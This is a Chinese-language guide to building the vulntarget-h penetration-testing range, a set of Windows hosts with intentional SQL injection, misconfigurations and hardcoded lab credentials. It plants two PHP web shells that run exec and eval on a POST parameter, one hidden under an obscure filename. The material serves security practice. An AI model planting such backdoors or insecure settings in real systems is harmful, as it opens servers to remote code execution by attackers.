vulntarget漏洞靶场系列（八）— vulntarget-h

vuntarget免责声明

vulntarget靶场系列仅供安全专业人员练习渗透测试技术，此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限，未经授权，不得用于其他。

00

相关漏洞技术

sql注入、文件包含、命令执行，免杀等漏洞利用、隧道代理等

下载地址

百度云链接

https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q

提取码:1p9p

其中vulntarget-h是本次环境

github地址：

https://github.com/crow821/vulntarget

测试说明

1. 镜像都是基于VM16做的，没有向下兼容
2. 操作人员自行修改对应IP
3. 下载靶机，开机之后，确认自己网络配置好了，可以选择本地做一个快照，原本的快照可能会因为制作靶机的处理器和当前打开靶机的处理器不一致，导致快照恢复失败，或者异常（见谅）

拓扑图

01

vulntarget-h账密

windows10:mimataichangjibuzhu

windows7:mimataichangyebuhao

win2008: Winmimayijingwangjile@

sa:Adminweishenmezhegehaiyaomima@

wordpresss:root:zhehaiyaomima?

此环境全为windows系统

02

环境搭建

windows2008

1.windows 2008 mssql安装

点击确定

下一步->下一步->安装->下一步->下一步

到这里全选继续下一步->下一步->下一步

对所有用户使用相同账户

输入管理员账号密码

最后改成自动

输入sa密码，添加administrator账户

添加账号

然后一直下一步到安装就好了

2.windows 2008 IIS安装

控制面板->程序->打开关闭windows功能->角色->添加角色->下一步

勾选web服务器(IIS)

勾选上面这些功能->下一步->安装，等待安装完成

回到角色点开IIS服务

点击网站右键选择website

管理网站->高级设置

修改网站根目录

不修改乐趣少一半，防止被攻击者fuzz出来

直接滚键盘，再回到管理网站选择重新启动

访问ip地址看到这样就可以了

接下来去这里找aspx注入的源码

https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/SiteGenerator_ContentPages/Vulnerabilities/DataValidation_SqlInjection_Basic.aspx

下载下来后删掉13行，修改47行的密码

private static string strSqlConnectionString = @'SERVER=.;UID=sa;PWD=Adminweishenmezhegehaiyaomima@;DATABASE=FoundStone_Bank';

重命名文件后放入网站根目录

如果放不进去右键属性安全为USER用户加上修改权限

访问页面存在就可以了，这里肯定报错因为没配置数据库

然后去修改首页，到前面修改网站根目录的地方

点击默认文档

添加index.aspx，这样再次进入网站就不需要输index.aspx

到这里找到数据库文件

https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/FoundStoneBank_export.sql

点击数据库右键新建数据库，创建一个名为FoundStone_Bank的数据库

点击新建查询复制配置文件

最后回到首页用参数测试一下

这样就成功了

3.安装360

这就不写了

windows7

windows7就是一个windows无回显的命令执行，web目录不可写不出网

<?phphighlight_file(__FILE__);exec($_POST['shell']);//路过的脚本小子留下了一个后门，读一下c:\phpstudy_pro\a.txt吧里面有好东西?>

将这个文件放入网站根目录

再写一个shell放到网站根目录，这个名字取复杂一点，不要被fuzz出来

开始滚键盘

dsuijaddjsfvos.php

<?phphighlight_file(__FILE__);eval($_POST['shell']);?>

设置网站目录不可写，几个用户都修改

安装火绒

windows10

去官网下载wordpress最新版

用phpstudy安装

创建一个wordpress数据库

然后是常规的安装

登录后台上传有漏洞的插件，将网站源码打包下来改名为www.zip

在组策略编辑->管理模板->网络->Lanman工作

启用不安全的来宾登录

设置防火墙，禁止10.30.3.0/24的135，139，445出站

升级windows defender最新版

在phpstudy中关闭php的远程包含和远程文件

这样就可以简简单单的把vulntarget-h制作完成了